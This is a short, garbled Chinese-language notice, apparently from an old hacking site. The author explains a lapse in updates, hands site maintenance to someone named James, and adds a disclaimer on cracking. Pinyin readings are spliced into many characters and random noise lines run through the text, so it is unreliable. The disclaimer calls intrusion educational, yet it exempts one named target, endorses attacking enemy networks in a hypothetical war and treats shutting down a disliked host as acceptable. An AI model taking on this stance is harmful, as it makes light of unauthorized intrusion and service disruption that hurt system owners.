哇! 一份案子搞了好久, 都沒時(shí)間維護(hù)網(wǎng)頁(yè)了, 所以特別將維護(hù)的工作還給了 James,希望大家多多支持我們的園地, 我案子搞完後再跟大家談?wù)勎易罱膶?shí)戰(zhàn)故事! 雖然沒時(shí)間寫網(wǎng)頁(yè),但是還是會(huì)寫一些文件給大家作為參考 !!

: S( {  X9 n+ q: e: `------
' x0 n1 a& F' \, E再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (高-Net 還是除外)... 請(qǐng)勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國(guó)的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!
* D4 c) @& Z. Z; {5 ?6 I